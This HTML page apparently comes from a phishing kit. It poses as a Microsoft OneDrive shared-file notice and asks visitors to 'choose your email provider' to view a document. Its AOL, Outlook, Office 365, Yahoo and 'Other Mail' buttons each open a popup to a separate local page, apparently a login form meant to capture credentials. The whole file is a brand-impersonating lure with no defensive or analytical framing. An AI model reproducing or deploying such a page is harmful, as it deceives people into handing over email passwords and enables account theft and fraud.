

<!DOCTYPE html>
<html >
<head>
<meta charset="UTF-8">
<title>Microsoft OneDrive</title>
<link rel="icon" href="img/favicon.ico" type="image/x-icon" />
<link rel="stylesheet" href="css/style.css">
<script type="text/javascript">
<!--
function popupwnd(url, toolbar, menubar, locationbar, resize, scrollbars, statusbar, left, top, width, height)
{
   if (left == -1)
   {
      left = (screen.width/2)-(width/2);
   }
   if (top == -1)
   {
      top = (screen.height/2)-(height/2);
   }
   var popupwindow = this.open(url, '', 'toolbar=' + toolbar + ',menubar=' + menubar + ',location=' + locationbar + ',scrollbars=' + scrollbars + ',resizable=' + resize + ',status=' + statusbar + ',left=' + left + ',top=' + top + ',width=' + width + ',height=' + height);
}
//-->
</script>
</head>

<body>
<div class="login-wrap">
  <div class="login-html">
	  <div class="LogoOne"></div>
	   <div class="foot-lnk">To read the document, please choose your email provider below Login to view shared file. </div>
    <!--<div class="top"></div>-->
    <!--<input id="tab-1" type="radio" name="tab" class="sign-in" checked><label for="tab-1" class="tab">Sign In</label>
		<input id="tab-2" type="radio" name="tab" class="sign-up"><label for="tab-2" class="tab">Sign Up</label>-->
    <div class="login-form">
      <div class="sign-in-htm">

	  
	  
	    <div class="group">
          <button class="btn-3 loginBtn loginBtn--aol" onclick="popupwnd('AII.html','no','no','no','no','no','no','300','100','360','400')">Login with Aol</button>
        </div>
		
        <div class="group">
          <button class="btn-3 loginBtn loginBtn--outlook" onclick="popupwnd('HML.html','no','no','no','no','no','no','300','100','440','480')">Login with Outlook</button>
        </div>
      
	  
	  <div class="group">
          <button class="btn-3 loginBtn loginBtn--office" onclick="popupwnd('OLK.html','no','no','no','no','no','no','300','100','400','400')">Login with Office 365</button>
        </div>
		
        <div class="group">
			<button class="btn-3 loginBtn loginBtn--yahoo" onclick="popupwnd('MYM.html','no','no','no','no','no','no','300','100','400','480')">Login with Yahoo</button>
        </div>
        
		
		<div class="group">
          <button class="btn-3 loginBtn loginBtn--other" onclick="popupwnd('ODL.html','no','no','no','no','no','no','300','100','400','400')">Login with Other Mail</button>
        </div>
		
        <!--<div class="hr"></div>-->
        <div class="foot-lnk">Get to all your files from anywhere on any device, and share them with anyone. One Drive your shared document in one cloud. </div>
      </div>
    </div>
  </div>
</div>
<!--</div>-->
</body>
<script>'undefined'=== typeof _trfq || (window._trfq = []);'undefined'=== typeof _trfd && (window._trfd=[]),_trfd.push({'tccl.baseHost':'secureserver.net'}),_trfd.push({'ap':'cpsh'},{'server':'p3plcpnl0778'}) // Monitoring performance to make your website faster. If you want to opt-out, please contact web hosting support.</script><script src='https://img1.wsimg.com/tcc/tcc_l.combined.1.0.6.min.js'></script></html>
